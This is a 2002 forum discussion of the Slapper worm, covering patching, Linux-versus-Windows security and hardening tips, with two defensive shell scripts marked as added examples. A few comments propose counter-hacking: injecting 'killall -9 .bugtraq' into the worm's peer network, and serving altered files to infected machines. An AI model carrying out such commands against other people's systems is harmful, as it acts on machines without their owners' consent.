New Mac Users Should Take Note, Too
by
Spencerian
·
· Score: 2
For the newbies, remember that Mac OS X is a UNIX family member, too, and comes with Apache as well. The Mac world is used to getting only one or two attacks over a year that it could be easy to skip over this one.
Thankfully, Apple thought about their security model, so Mac OS X ships with Apache (known in its System Preferences as Personal Web Sharing) and many other common access features switched off by default.
Switching Personal Web Sharing on can make your Mac just as vulnerable to some, if not all of the effects of this worm (if this or any other worm contains x86-specific code for its payload, little to no effect may occur).
Apple's already addressed these vulnerabilities in their recent Security Updates. You can install them from the Software Update system preference or download them from Apple.
-- Vos teneo officium eram periculosus ut vos recipero is.
A false sense of security
by
abhikhurana
·
· Score: 4, Interesting
I think that linux provides the sys admins with a false sense of security. Most sysadmins think that because they are running Linux, they can't be infected with any viruses and worms. The result of this is that many of these administrators never bother to check about new threats, because they haven't seen anything like this for a while. Normally linux administrators are more tech savvy than Windows administrators but as the linux GUI improves, one will see a proliferation of not so tech savvy administrators in the Linux market as well. So be prepared for increasing amounts of damage which such worms can cause. On the other hand, the administrators of Windows machines, because they are facing a new worm every second day, try to stay up to date with the latest news and patches. Most of them have automatic update wizards running on their machines which download new patches instantly. In fact I would prefer such an instant update wizard for Linux as well, especially for the Linux running security critical applications, so that even if the system administrator is too lazy to check a news site, he will still come to know about the threat. And because it will be running on linux, it will do what it's supposed to do, not "God knows what and Gates knows what" as is the case with the windows update wizard.
Re:A false sense of security
by
Winterblink
·
· Score: 3, Insightful
You know, I'm with you on this one. I know of friends who decided to jump on the Linux bandwagon, installed the OS and associated daemons and programs, had a fun time customizing their desktop, etc. Never put a single shred of time and effort into looking into any aspects of security. Asking them, the response was, nine times out of ten, "It's Linux man. Security out of the box." or something to that effect. These same people, myself included, when installing Windows head straight to the Control Panel and start deactivating nonessential services as one of the first steps. Subsequently, virus scanners, firewall software (ZoneAlarm, whatever), etc. Hell even my father hits WindowsUpdate and Norton LiveUpdate like it's a religion or something.
Good post man.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
Re:A false sense of security
by
sparkz
·
· Score: 2
For Windows Update to work, everything must be installed where MS expects it - if you moved IE to C:\Your Programs\Internet Exploiter\ then Windows Update wouldn't get it.
Similarly, for such a Linux tool to work, it would require that everything is installed in a particular, predictable way; this is how apt-get et al. work.
If you've installed Apache SSL into /usr/webserver/secure/featherything/indian/apache-with-modssl/ then no automatic update facility has a chance of finding it...
Re:A false sense of security
by
mcrbids
·
· Score: 2
There is!
1) (Debian) apt-get
2) (RedHat) up2date
3) (Gentoo) emerge
Other distros usually have something similar...
-- I have no problem with your religion until you decide it's reason to deprive others of the truth.
Re:A false sense of security
by
abhikhurana
·
· Score: 1
Well, that can be solved easily enough. All that's required is that when one installs an application, that application registers its path in a file and the automatic update uses this file to find the path for that particular application. That's one idea. I am sure that there are many more out there.
The exploit is well known and people are aware of it. It's the same thing that Slapper.A and Slapper.B used.
Also, while the article makes much of "thousands" of servers compromised, it ignores the fact that the number of compromised servers is (at least last I saw) in the five digits, and pretty much leveled off to very few new infections.
Similar Windows worms (like Code Red) infected hundreds of thousands of machines, and took much longer to level off. Yes, there are still a lot of computers out there, but UNIX admins are a lot more on top of their machines than Win admins, by these numbers.
sysadmins?
by
Shadestalker
·
· Score: 4, Insightful
Lots of comments here mention that sysadmins are to be faulted for the spread of this worm. I wonder how many of the infected systems were in fact installed by part-timers who then walked away, or are just being run by newer linux users.
Keep watching, you'll see more of this as linux becomes even easier to install and use. Joe User likes it because it's easy to install and comes with lots of services he can run right out of the box. Joe User doesn't do sysadmin work, what do you mean it doesn't update itself?
Automatic update utilities need to keep pace with the ease of use and hands-off administration that people generally apply to a desktop OS like Windows, otherwise we're basically handing all these new users a gun that's already pointed at their heads.
Comment removed
by
account_deleted
·
· Score: 4, Interesting
Comment removed based on user account deletion
I don't understand it.
by
Anonymous Coward
·
· Score: 0
If open source has tons of programmers around the world reviewing every piece of code, how is there a security vulnerability? Could it be that open and proprietary software SHARE some of the same problems? Nah. Couldn't be.
It has been brought to our attention that several posters on this thread have implied that this viral outbreak is in some way connected to the open source community and their users. Slashdot wishes to reiterate their dogmatic belief:
Virus:= Bad
OpenSource:= Good
Microsoft:= Bad
Thus proving that any suggestion of a bug/vulnerability in Linux/Apache is a figment of a deluded imagination and you're most likely Welsh.
inconsistent Slashdot taxonomy
by
Anonymous Coward
·
· Score: 0
When OpenSSL was updated to include ECC, it was classified as "BSD".
When OpenSSL design flaw opened a path for exploits it was classified as "Linux".
He said that operating systems will inherently have security holes.
I wonder if he meant that operating systems will inherently have remote security holes? I'm not so sure that's true, if you're using few servers, simpler ones, and ones not written in C.
Time to chroot apache
by
Icy
·
· Score: 2, Informative
I don't know why more people don't chroot apache or patch to use chroot(2). It can be a pain at times, but it can't be worse than having to reformat and reinstall the entire os because you are not sure what was tampered with. I know chroot is not perfect and you can break out of it, but as long as you are careful about what goes in it, you are relatively safe. It would at least keep rootkits away from gcc, which seems to be required for most of these rootkits.
Re:Keep your anti virus software up to date also..
by
byran+lei
·
· Score: 0
> I find it somewhat odd that each advisory from an anti-virus vendor concerning the slapper worm advises to not only patch your software, but also keep your antivirus software current.
> If the software is patched then antivirus software is irrelevant.
> How big is the antivirus software market for linux?

There isn't one and there still won't be one after this, because you don't need antivirus software to either detect or fix the problem. That's the big problem the anti-virus outfits are running into. The open source movement still doesn't need them.
At the risk of sounding stupid...
by
Anonymous Coward
·
· Score: 0
Upgrading OpenSSL isn't the only necessary step. I patched mine, and forgot to restart Apache -- and got hit by the "A" variant last week. Picked it up immediately, and removed it. It's pretty harmless as these things go, but it dawned on me when I cleaned it up and did a tripwire check to make sure nothing had changed that I hadn't restarted Apache when I upgraded the libraries.
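The point made in the post above, that a library upgrade does nothing for a daemon still running with the old copy mapped, can be checked mechanically on Linux: /proc/<pid>/maps marks a mapping whose file has since been replaced on disk as "(deleted)". The following is an added example written for this page (not from the thread, Slapper, or any distribution) that scans a maps file for stale libssl/libcrypto mappings; the sample maps content is constructed.

```shell
#!/bin/sh
# Find processes still mapping a shared library that was replaced on disk.
# Upgrading the OpenSSL package does not touch a running httpd: the old
# libssl/libcrypto stay mapped until the process is restarted, and Linux
# shows that in /proc/<pid>/maps with a trailing "(deleted)".
# Hypothetical helper written for this thread, not from any vendor or distro.
# Limitation: paths containing spaces are not handled (field-based parsing).

# Usage: stale_lib_mappings <maps-file> [egrep-pattern]
# Prints each distinct "(deleted)" mapping whose path matches the pattern
# (default: libssl or libcrypto). Returns 0 if any were found, 1 otherwise.
stale_lib_mappings() {
    maps="$1"
    pat="${2:-lib(ssl|crypto)}"
    found=$(awk '$NF == "(deleted)" { print $6 }' "$maps" | grep -E "$pat" | sort -u)
    [ -n "$found" ] || return 1
    printf '%s\n' "$found"
}

# Scan every process on a Linux host; prints "pid path" per stale mapping.
# Needs root to read other users' maps files.
scan_running_processes() {
    for m in /proc/[0-9]*/maps; do
        pid=${m#/proc/}; pid=${pid%/maps}
        stale_lib_mappings "$m" "$@" 2>/dev/null | sed "s|^|$pid |"
    done
}

# Constructed sample (not a real capture): an httpd that was started before
# the OpenSSL upgrade, plus an unrelated stale libpthread that the default
# pattern should ignore.
sample_maps() {
    cat <<'EOF'
08048000-0810b000 r-xp 00000000 03:01 65540      /usr/sbin/httpd
b7d00000-b7d4c000 r-xp 00000000 03:01 98765      /usr/lib/libssl.so.0.9.6 (deleted)
b7d4c000-b7dff000 r-xp 00000000 03:01 98766      /usr/lib/libcrypto.so.0.9.6 (deleted)
b7e00000-b7e20000 r-xp 00000000 03:01 12345      /lib/libpthread.so.0 (deleted)
b7f00000-b7f1f000 r-xp 00000000 03:01 22222      /lib/ld-linux.so.2
EOF
}

if [ "${1:-}" = "--demo" ]; then
    tmp=$(mktemp); sample_maps > "$tmp"
    stale_lib_mappings "$tmp"
    rm -f "$tmp"
fi
```

Run scan_running_processes as root after every libssl/libcrypto update; anything it lists (httpd, but also stunnel, sendmail with TLS, sshd) has to be restarted, not just the service you were thinking about. A statically linked mod_ssl will not show up here at all, which is a reason to prefer the shared build.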
Re:Finally - Linux can be utilized as a Desktop OS
by
Anonymous Coward
·
· Score: 0
Not to troll, but doesn't anybody see a big big problem?
Okay, so somebody out there is coding Worms especially for Linux. No problem, that was to be expected.
But the problem is this, the patch could be made by anyone, right? So this patch could also be infected or make things worse...
I myself NEVER check code on Linux, just because I can't code and don't want to... So I would download the patch and install it, but how can I be sure the patch isn't another Worm or Trojan?
I could wait for an "official" release by Suse, but hey... I want to patch this [fill new worm name here] worm's threat as soon as possible, mainly BECAUSE I don't have a clue how it works...
Please don't reply with "Get A Clue" because that's for me (and I guess for a lot of people) no option...
Well if security of the patch is a concern, follow these simple rules. Make sure that the patch is digitally signed and verify the signature. Your only other recourse is to unplug your Webserver from the net and wait for Suse.
It's the job of the maintainers to ensure that patches are safe. I wouldn't advise downloading a random patch and applying it to your computer, but an "official" signed patch should have been reviewed and be safe to apply before Suse releases a new binary.
From: Ron DuFresne [mailto:dufresne@winternet.com]
Sent: Tuesday, September 24, 2002 9:54 AM
To: firewalls@isc.org
Subject: Slapper worm redux;
Those folks relying upon security through obscurity might well wish to get on the ball and fully patch-up;
September 23 VNUNET.COM. A suspect has been arrested on suspicion of authoring the Slapper worm. But although the threat of the worm seems to have been short-lived, a new variant is already set to take up where its predecessor left off. Although the ISC's 'most attacked ports' chart no longer features Slapper in its Top 10 a variant, Slapper.B, has been spotted in the wild. Slapper.B has several subtle differences, but is for the most part an updated version of its predecessor. Both worms attempt to exploit a known vulnerability in the Secure Sockets Layer 2.0 (SSLv2) handshake process. The two variants also carry the same payload, a password-protected backdoor and denial of service (DoS) capabilities. ISS's Morgan said that with the new variant on the loose his company had calculated that about 10,000 servers were probably now infected, and that the network was probably going to be used for DoS attacks. He added that it was unlikely the original author created the second worm. "It was significant that source code for the original Slapper was distributed within the computer underground immediately after the worm was detected in the wild," he said. Source: http://www.vnunet.com/News/1135274
-- "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
No, you are actually wrong on that. If you compare the number of IIS servers (they're all windos) and the number of Apache/Linux servers, then Apache/Linux is up front. Even if you double the number to account for people running IIS on their home-desktop, you get nowhere near the "infected-to-unaffected" ratio.
Remember that all the "95% market share" babble is about desktop systems, while both Slapper and CodeRed are targetting server systems, where windos is one among many, and by far not the leader.
Ah, but it's not an Apache exploit, but an SSLv2 exploit, no? Not every server running Apache is going to be running the SSL stuff as well. So suddenly, it's a bit smaller pool of boxes, and the 'installed base' thing comes back into prominence.
-- Vintage computer games and RPG books available. Email me if you're interested.
Good point, and true. However, the difference is not an order of magnitude, and as such doesn't matter much. If Slapper has 2% or 5% of the CodeRed impact is not an issue. If it had 20% instead of 2%, it would.
You can find figures on SSL servers at netcraft, unfortunately only if you pay for their SSL report.
Heh, so is this a valid statement then?
"A Slapper Slapped Her Slapper!"
--
"Hell hath no fury like a woman scorned for SEGA...."
On Onions and Carrots
by
Ektanoor
·
· Score: 4, Insightful
Some have been claiming around here that slapper is a "demonstration" that Linux is no better than Windows, maybe worse... Sorry you people but this talk is just about onions and carrots. The fact is that a very similar attack, that happens nearly a year after CodeRed/Nimda carmageddon, shows a huge difference between both worlds.
If anyone takes the care to look at incidents.org site, one may see the facts for himself. Slapper didn't hit the stands. It is far from its Windows cousins, not only in terms of infected machines but also in attacks. And note specially the attacks. In less than 12 hours after Nimda's appearance I had more than 340000 Nimda "visits" on the network I supervised. On what concerns Slapper, till now things are nearly on zero. Slapper is in no way a second Nimda.
Re:On Onions and Carrots
by
jmcnamera
·
· Score: 1
You said
"It is far from its Windows cousins, not only in terms of infected machines but also in attacks."
Are you implying that Windows hackers write better (more destructive) worms than Linux hackers? You should be cast into the void for implying they are better than we, the pure and righteous.
-- this is not a sig
Re:On Onions and Carrots
by
Anonymous Coward
·
· Score: 1, Insightful
You, like most of the other Linux apologists on here, seem to be missing the point. I haven't seen anyone trying to make the argument that this worm is anywhere near the scale of Code Red/Nimda. What I have seen is a lot of people trying to point out the big hole this blows in the Open Source/Linux mythology.
How many times have we heard that Linux is more secure, Linux admins are just better, Open Source programmers fix problems fast? How many times have we heard, in fact, that nothing like this could happen on Linux? This worm proves otherwise and that is the important point.
Re:On Onions and Carrots
by
Anonymous Coward
·
· Score: 0
How many times have we heard that Linux is more secure,
It _is_ more secure. You say so yourself:
I haven't seen anyone trying to the make the argument that this worm is anywhere near the scale of Code Red/Nimda.
By virtue of the fact that is nowhere near the scale of the atrocity of those two worms, you admit that Linux is more secure.
Linux admins are just better,
There is no direct evidence to support this, but the simple fact that only 11,000 - 15,000 have been infected means that Linux admins are apparently good at patching their systems. Therefore, better.
Open Source programmers fix problems fast?
This vulnerability has been known about and fixed for months. Months. Before there was even the first Slapper virus. That sure seems fast to me, if a patch is produced before there is a known problem.
How many times have we heard, in fact, that nothing like this could happen on Linux?
No one I know has ever said this. You are quite right; if someone said that, they are blowing it out their ass. Even so, Linux is simply inherently more secure than Windows will ever likely be.
Re:On Onions and Carrots
by
Anonymous Coward
·
· Score: 0
How many times have we heard that Linux is more secure,
It _is_ more secure. You say so yourself:
I haven't seen anyone trying to the make the argument that this worm is anywhere near the scale of Code Red/Nimda.
By virtue of the fact that is nowhere near the scale of the atrocity of those two worms, you admit that Linux is more secure.
Wrong. What I said was that the Slapper outbreak is on a much smaller scale than Code Red, nothing about relative security. In fact (once again), the fix for Code Red was out at least a month before the virus was spotted in the wild. Code Red was due more to lazy/incompetent admins than lack of security.
Linux admins are just better,
There is no direct evidence to support this, but the simple fact that only 11,000 - 15,000 have been infected means that Linux admins are apparently good at patching their systems. Therefore, better.
This doesn't prove that at all since absolute numbers usually don't provide a clear picture when they aren't placed in the proper context. To use Code Red as an example, people here often throw around the 350000 server number to make IIS look bad. And it does look bad. But consider that at the time of the outbreak, there were approximately 8 million IIS servers on the internet (according to Netcraft). That comes out to about a 4% infection rate. Suddenly it doesn't sound as bad. By the same token, if you want to know the true extent of Slapper, you need to know how many Apache installations run on Windows compared to *nix, and how many of those *nix installations also use OpenSSL. I'm sure that Linux/Apache still comes out better when those considerations are taken into account, but the point remains that you can't infer that just from those numbers.
Open Source programmers fix problems fast?
This vulnerability has been known about and fixed for months. Months. Before there was even the first Slapper virus. That sure seems fast to me, if a patch is produced before there is a known problem.
So what? As I said, a patch for Code Red/Nimda was out way before the worms hit. In my experience, most MS patches are released before some cracker comes up with an exploit.
How many times have we heard, in fact, that nothing like this could happen on Linux?
No one I know has ever said this. You are quite right; if someone said that, they are blowing it out their ass. Even so, Linux is simply inherently more secure than Windows will ever likely be.
Really? Because I see that statement made just about every time one of these discussions happens. I'm sure it's just some vocal minority of clueless wannabes, but as with most such groups they give outsiders the impression that they speak for the whole community. I don't mind calling out lazy/incompetent Windows admins because these people make me look bad. The /. community should take this kind of attitude with its own members. As for Linux being more inherently secure than Windows, I'll give you that one. But then, I never argued against it in the first place.
Retarded:A few hopes...
by
aphor
·
· Score: 3, Insightful
Let me explain the process. You tell me if the analogy fits.
robber:
You have a serious bug that can compromise a lot of running systems.
OpenSSL:
Oh really?
robber:
I'm serious. Here's how to exploit it, and here's a patch. I demand you fix it.
OpenSSL:
Let me have a look at that... We promise we'll fix it.
robber:
Well, I found it by accident, but it only took me a few hours to write the exploit and the patch. It shouldn't take more than a day or so to get the fix out.
OpenSSL:
We will update our code and send out a patch notice, but it's up to the users to upgrade on their own...
robber:
To give your notice some teeth, I'm going to post the worm to Usenet in 30 days if nobody beats me to it.
The original had an 'execute local command' option, and some wise bugtraq reader (no, it wasn't me:) noticed that one could inject 'killall -9 .bugtraq' into the infection network, to shut it down.
Or failing that, one might write a wee proggie to sit on UDP port 2002, and reply to any connections with this command. One would, of course, run this on an isolated machine...
Re:Source Code?
by
whovian
·
· Score: 3, Informative
one might write a wee proggie to sit on UDP port 2002,
Not good enough, I don't think.
I'm seeing remote ports 2140:2144 being used to attempt to connect to port 443.
So, I'm denying port 443 incoming and monitoring all outgoing unaccounted for udp. (Yes, we were infected.)
-- To-do List: Receive telemarketing call during a tornado warning. Check.
mv /usr/bin/gcc /usr/bin/gcc-backup
by
ylikone
·
· Score: 1
Wouldn't moving the /usr/bin/gcc command to a backup file stop these worms from spreading? Move it back only temporarily when you need to "make" something.
-- Meh.
Slapper: The threat that wasn't?
by
Andy+Dodd
·
· Score: 2, Insightful
Yes, I'm going to be joining in the crowds of the "Windows still sucks despite this". And here's my reason why:
Simply put, as one person commented, a default Linux installation usually defaults to almost all services being turned OFF, whereas many Windows installations default to vulnerable services being ON.
As a result, the percentage of Linux servers that are actually intended to be servers is FAR greater than the percentage of Windows machines with IIS running that someone is actively maintaining.
As a result, more systems get patched sooner.
For a little dose of reality about Slapper: A friend of mine installed a honeypot on his network, waiting for a Slapper hit so he could check out this new, oh-so-uber threat to our wonderful Linux.
After a few days (might've been as long as a week), Slapper finally hit his machine.
Guess what else hit his machine? Code Red, a year-old Windows worm that made headlines *well over a year ago*, a minimum of 12 CR hits per DAY.
Now, given the Netcraft statistics where Apache has 40-50% of the marketshare of web servers on the 'net - Shouldn't Slapper be hitting more often than Code Red?
But it isn't, because Linux installations are more secure out-of-the-box, and are NOT vulnerable out of the box. One of the main reasons so many Windows machines aren't having IIS patches applied is because the user doesn't even know that IIS is running!
-- retrorocket.o not found, launch anyway?
The difference is not so clear
by
FallLine
·
· Score: 2
Tell me precisely what the difference is, in reality, between the so-called white hats that publish exploit code that allows script kiddies across the world to execute arbitrary code (w/o any modification) on remote machines and the so-called black hat that does the same thing only does not require the same number of script kiddies (because it is self-perpetuating)? Neither necessarily use or commence the attack themselves, but they enable thousands of machines to be hacked just the same. Maybe you can argue that proof of the concept does not require self-perpetuation or the installation of a backdoor (as in the case of the worm), but nor does it require the execution of code that is desirable to the script kiddy (as in the case of many so-called white hat advisories).
chkvulnerability?
by
Anonymous Coward
·
· Score: 0
Is there something that will check a system for _vulnerability_ as opposed to just if it's infected?
I think the idea is that the slapper worm will try to grab something from server X (which it believes to be infected) and it tries to run that. If I replaced what it was expecting with something else, that can't be my fault - an external entity was grabbing code off my servers and executing it, not me.
Sysadmins just put an apt-get update in their list of cron jobs. I'm sure it'll save them time by not having to constantly check for security holes, etc online.
The job of the sysadmin is to stay on top of what is being revealed as vulnerable and then to act appropriately so as to mitigate risk. Updating packages automatically isn't doing that - what if the repository that apt is hitting has been compromised? What if the new version of package X has other issues that make it less than optimal?
One does not approach being secure by putting one's faith in some tool and hoping it solves everything. The only way to lock down a box is to be vigilant and aware, in my experience.
The problem isn't not having packages automatically updated, but rather that there are sysadmins who are militantly unaware of disclosed vulnerabilities in the software they run. Solve the latter and you don't need the (somewhat short-sighted) former.
-- We who were living are now dying
With a little patience
Re:Slapper: The threat that wasn't?
by
Dionysus
·
· Score: 2, Informative
Not all Apache servers run on Linux. Not all Linux systems run Apache. Not all Linux/w Apache has mod_ssl.
-- Je ne parle pas francais.
If you're an admin...
by
otis+wildflower
·
· Score: 2, Insightful
... and you haven't already patched this months-old hole, hand in your resignation now. There's lots of folks more competent than you who need work.
I've never understood...
by
HarryLeBlanc
·
· Score: 0, Offtopic
...why buffer overflow viruses are such a common vulnerability in software. Yes, I grok how they work, but their effectiveness depends on knowing in advance exactly how big the buffer is.
It would be trivially easy to write a function to randomly assign buffersize based on parameters (say, min max and optimal size), and even change its size periodically at runtime. That would eliminate this entire class of attack.
Is my Linux/PPC box safe?
by
Anonymous Coward
·
· Score: 0
Correct me if I'm wrong but these Slapper viruses only infect ix86 Linux distributions. Since it is a buffer overflow attack the code that overflows must be platform specific. In which case my PowerPC machines are safe from this round of viruses as the virus can only infect ix86 machines.
Equality
by
Anonymous Coward
·
· Score: 0
"Windows Admin with Thumb Up Butt" == "Linux Admin with Thumb Up Butt" == "No Admin At All"
Watch for trojans! Use your own binaries!
by
Wee
·
· Score: 3, Informative
Since chkrootkit normally uses lots of stuff that usually lives in /bin (strings, ps, ls, find, etc), make extra sure that you use the '-p <directory>' flag when you run it. That tells chkrootkit to look for the binaries it needs in that directory instead of wherever they are found in your path. Before you can do this, however, you need to (from a fresh, known-to-be-clean install) either copy all the needed binaries to a CD-R or to a partition re-mounted as read-only. A real paranoid would re-compile static versions of those utils and then use those. YMMV.
It does very little good to check for a rootkit when all the good GNU stuff in /bin has been trojaned...
-B
--
Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.
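The staging step described in the post above, as an added shell example (not part of the post and not chkrootkit's own code): it copies the tools chkrootkit depends on from a known-clean tree into a separate directory, records their checksums in a manifest, and re-verifies them before handing the directory to chkrootkit -p. The tool list beyond the four the post names, the MANIFEST file name and the digest helper are assumptions.

```shell
#!/bin/sh
# Added example (hypothetical helper, not part of chkrootkit): stage trusted
# copies of the tools chkrootkit runs, then point chkrootkit at them with -p.
# The tool list is an assumption; the post names strings, ps, ls and find.
TRUSTED_TOOLS="awk cut echo egrep find head id ls netstat ps sed strings uname"

# digest FILE: print a SHA-256 hex digest; falls back to shasum where
# sha256sum is not installed.
digest() {
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        shasum -a 256 "$1" | cut -d' ' -f1
    fi
}

# stage_tools SRCROOT DEST: copy each tool from SRCROOT/bin, SRCROOT/usr/bin,
# SRCROOT/sbin or SRCROOT/usr/sbin (a mounted known-clean install) into DEST,
# make the copies read-only and write DEST/MANIFEST with one digest per tool.
stage_tools() {
    src="$1"; dest="$2"
    mkdir -p "$dest"
    : > "$dest/MANIFEST"
    for tool in $TRUSTED_TOOLS; do
        found=""
        for dir in bin usr/bin sbin usr/sbin; do
            if [ -f "$src/$dir/$tool" ]; then found="$src/$dir/$tool"; break; fi
        done
        if [ -z "$found" ]; then
            echo "stage_tools: $tool not found under $src" >&2
            return 1
        fi
        cp -p "$found" "$dest/$tool"
        chmod 0555 "$dest/$tool"
        printf '%s  %s\n' "$(digest "$dest/$tool")" "$tool" >> "$dest/MANIFEST"
    done
}

# verify_tools DEST: re-hash every staged tool against DEST/MANIFEST. Returns 1
# and names the offending tool if a copy is missing or has been altered, so a
# trojaned copy on writable media is caught before chkrootkit trusts it.
verify_tools() {
    dest="$1"; status=0
    while read -r sum name; do
        if [ ! -f "$dest/$name" ] || [ "$(digest "$dest/$name")" != "$sum" ]; then
            echo "verify_tools: $name missing or modified in $dest" >&2
            status=1
        fi
    done < "$dest/MANIFEST"
    return $status
}

# run_chkrootkit DEST: verify the staged tools, then run chkrootkit with -p so
# it uses them instead of whatever happens to be first in $PATH.
run_chkrootkit() {
    dest="$1"
    verify_tools "$dest" || return 1
    chkrootkit -p "$dest"
}

# Usage: sh stage.sh /mnt/cleanroot /mnt/cdrom/trusted-bin
if [ "$#" -eq 2 ]; then
    stage_tools "$1" "$2" && echo "staged into $2; now run: chkrootkit -p $2"
fi
```

Re-run verify_tools each time before chkrootkit, not only once after staging; the manifest is only as trustworthy as the media it sits on, so keep it on the same read-only CD-R or partition as the tools.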
Thanks, here's another (Re:mirror)
by
phorm
·
· Score: 1
Thank you extremely for putting this up. Seems my server is safe (and now patched), but it's good to know so that I don't have to worry. Also, it saddens me greatly to see that some buttmunch posted the full link, where to be a jerk or just out of sheer ignorance I don't know.
Here's a copy: triple-w.phormix.com/files/public/chkrootkit.tar.gz (replace triple-w. with www.)
"Worms" on the internet? will a "fish" take care of it? - phorm
Every time I hear about another buffer overflow, I scratch my head and ask, "Why doesn't anybody use libsafe?" This is a library which, once installed, protects all processes, regardless of whether they have been patched or not.
It transparently replaces the libc functions that are the usual targets of stack smashing attacks, and checks whether the stack frame has been overrun. If the stack has been smashed, the process gets terminated forcefully, and root (or other designated contact) gets an e-mail with all the details.
This has been out for several years now, and I am amazed that no major distribution includes this in a standard server install.
-Steve
-- Hey, Windows users, there is no such thing as "forward" slash, there is only slash and backslash.
I once wrote a C program on Linux that accidentally read one byte past the end of an array. It ran fine on Linux.
I uploaded the source to a BSD box, compiled, and ran it and got a segfault (or something like that). It appears that BSD mapped the program segments so that one byte past the end of my variables was an invalid address.
I still use Linux, not BSD, but I found this experience interesting to say the least. I think VAX/VMS also loaded programs in a similar way.
-- "We can't solve problems by using the same kind of thinking we used when we created them." -- Albert Einstein
Electric Fence in linux (or any other unix platform) will do this for you. It will segfault on any references beyond the end of malloc'ed arrays, use of free()'d memory, etc.
It's very easy to use too -- just link with -lefence or set $LD_PRELOAD to load it.
With it being out for so many years, it's a wonder that people don't make it standard practice to use it!
I'd be interested to see what kind of overhead this checking adds to a server. I'll agree that a slow, secure server is better than a fast, insecure server, but if it is too slow...
Also, I wonder how well this scales up to the enterprise. It may work well for several processes on a single box, but what happens when you distribute those processes to back-end servers. Each box on its own may be fine, but when they intercommunicate, problems could arise.
-- I'd rather you do it wrong, than for me to have to do it at all.
I'm surprised; I checked libsafe's availability under Debian, and although it's in my local package list, it's not downloadable for testing or stable, but it does have a version in unstable. It currently breaks scrollkeeper.
Update to self: Thanks to the new Package Tracking system, I read a better info page on libsafe and re-read a policy problem: libsafe isn't building on Alpha.
Re:libsafe !
by
Anonymous Coward
·
· Score: 0
> "Why doesn't anybody use libsafe [avayalabs.com]?" This is a library which, once installed, protects all processes, regardless of whether they have been patched or not.
FYI Slapper does not smash the stack, it uses a heap overflow. It corrupts the heap and abuses the glibc implementation of free() to patch the GOT of the Apache process and hijack control. Thus detection methods based on watching only the stack will fail to detect it.
It's certainly a good idea to try and prevent stack overflows, but it won't protect all processes against all attacks.
Regards, Fred
No Compiler? (Re:Same mantra applies...)
by
phorm
·
· Score: 1
And if there were no compiler, then all my ./configure, make && make install scripts would go to hell, seeing as though they all recompile themselves. A lot of useful patches often recompile themselves too.
Renaming your compiler binary instead of deleting it would probably be more useful, that way one could at least compile wanted code when needed.
I was infected a week ago. The next day I was warned by F-secure.
I removed the files. Commented out the open_ssl module and restarted Apache.
I had done an upgrade of openSSL in August or so I thought - problem: Redhat backported the patch to the same version number as installed with 7.2. I guess that I applied the wrong rpms.
As for gcc on the server - the server isn't in the same country as I am. I have never seen it in the flesh. I have a standard Redhat 7.2 on the machine because I need to compile stuff from time to time.
-- realkiwi
Re:autopsy
by
Anonymous Coward
·
· Score: 0
> As for gcc on the server - the server isn't in the same country as I am. I have never seen it in the flesh. I have a standard Redhat 7.2 on the machine because I need to compile stuff from time to time.
Consider having a script in /root that moves gcc to another filename, with no permissions, and another script that moves it back to gcc with normal access. Use as needed, and keep gcc disabled when not needed.
When I first heard about this "virus", I must admit my sphincter clenched up a bit, being responsible for more than a few Open SSL ecommerce servers (and just having started a week off from work to boot). But after looking into it for about 10 seconds, I realized I was ok since I upgraded in July.
Am I missing something here or are the people that did get affected by this people who simply ignored the July warning?
Think Pinto
by
Slipped_Disk
·
· Score: 2, Interesting
For those of you who don't recall, the Pinto was a car with a minor flaw - if you bumped into its ass it tended to explode in a fireball. Ford knew of the problem, and even had a "patch" to fix it (minor design change adding some shielding around the tank if I recall). They chose not to fix the problem because of economics.
The same principle applies to large companies and security patches - If there's no exploit and we don't tell anyone the problem exists, maybe we can get away without investing the time/money (programmers are expen$ive!) in fixing it. Much like Ford, they are gambling that the losses due to the bug/hole/whatever won't be significant enough to hurt their profits long-term.
Software is a business, like any other, and businesses tend to make stupid decisions when they see a way to save a few pennies. They may be wrong (VERY VERY WRONG), but until EVERYONE makes it clear that the "patch it when it gets exploited" mentality hurts their business, the companies will continue doing as they have done.
In the face of this smug and elitist attitude comes the fact that thousands of Linux servers are being compromised because their administrators don't apply patches in a timely fashion. Remember, too, that when the Nimda et al. worms hit, the Slashdot discussions included many regular readers who are also Windows administrators calmly pointing out that they had had no difficulties as they were patched long ago.
The figures being bandied about here are as follows: Code Red infected 400,000 systems. Slapper infected probably 15,000 systems. Considering that Microsoft IIS and Apache/ssl have comparable market share, I'd say the actual, practical, measured difference in vulnerability levels between Microsoft and Apache administrators is substantial.
Re:Slapper: The threat that wasn't?
by
Winterblink
·
· Score: 2
All you've served to point out is that, no matter what platform you choose to run, you should still be diligent in maintaining the security of the system.
No matter how secure Linux claims to be, people should take the perception of default installs being invulnerable out of the box with a huge grain of salt, and give it a good look for anything they can turn off or plug up. The same goes for Windows users, ESPECIALLY for them in my opinion.:) If anything this whole Slapper issue should serve to educate both sides of the Windows vs. Linux debate that security problems exist for everyone no matter what you run.
-- "I'm a leaf on the wind. Watch how I soar."
-Hoban Washburn
no kidding. where have you been??
by
Anonymous Coward
·
· Score: 0
This has been the biggest news in the security community for weeks. You guys are clueless.
And you keep ignoring an equally serious exploit involving trojanned configure scripts. Apparently because you reported on it in July you are willing to let your readers suffer ownership to avoid getting a bunch of lamer posts saying "you already reported this."
I don't know who's doing the counting, but my servers got slammed last week with probes from this damn worm. There are a hell of a lot more than 11,000 machines infected. The traffic I'm seeing from this worm is significantly higher than I saw from Code Red.
Re:Bullshit
by
Anonymous Coward
·
· Score: 0
Interesting results. Perhaps a suboptimal PRNG in Slapper is at play?
My results are quite different. For 3 servers in 3 wildly different subnets, I've gotten exactly 4 Slapper probes. During the same time interval, the same machines received 23 codered and nimda probes.
$ cd OpenSSL
$ (for obj in $(find . -name *.c); do grep strcpy $obj; done) | wc
     37      72    1197
$ (for obj in $(find . -name *.c); do grep strcat $obj; done) | wc
     47      57    1125
$ (for obj in $(find . -name *.c); do grep goto $obj; done) | wc
   2840   10161   71668
$
Most of the "goto"s are something like "goto end" or "goto bad". However, things like "goto start" look as if they could have been done using for(;;) { } or do { } while(..) or something similar instead.
